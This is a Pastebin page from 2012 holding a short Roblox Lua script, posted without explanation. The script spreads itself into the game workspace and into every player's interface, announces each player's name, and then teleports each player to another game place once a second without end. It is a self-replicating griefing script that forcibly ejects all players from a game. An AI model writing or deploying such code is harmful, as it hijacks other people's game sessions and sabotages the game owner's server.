Advertisement
Prehistoricman

script

Jun 5th, 2012
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.45 KB | None | 0 0
  1. if script.Parent ~= game.Workspace and script.Parent.className ~= "PlayerGui" then
  2. script:Clone().Parent = game.Workspace
  3. elseif script.Parent.className ~= "PlayerGui" then
  4. for _, a in pairs(game.Players:GetPlayers()) do
  5. script:Clone().Parent = a.PlayerGui
  6. local bob = Instance.new("Message", game.Workspace)
  7. bob.Text = a.Name
  8. delay(1, function () bob:Remove() end)
  9. end
  10. else
  11. while wait(1) do
  12. game:GetService("TeleportService"):Teleport(4352694)
  13. end end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement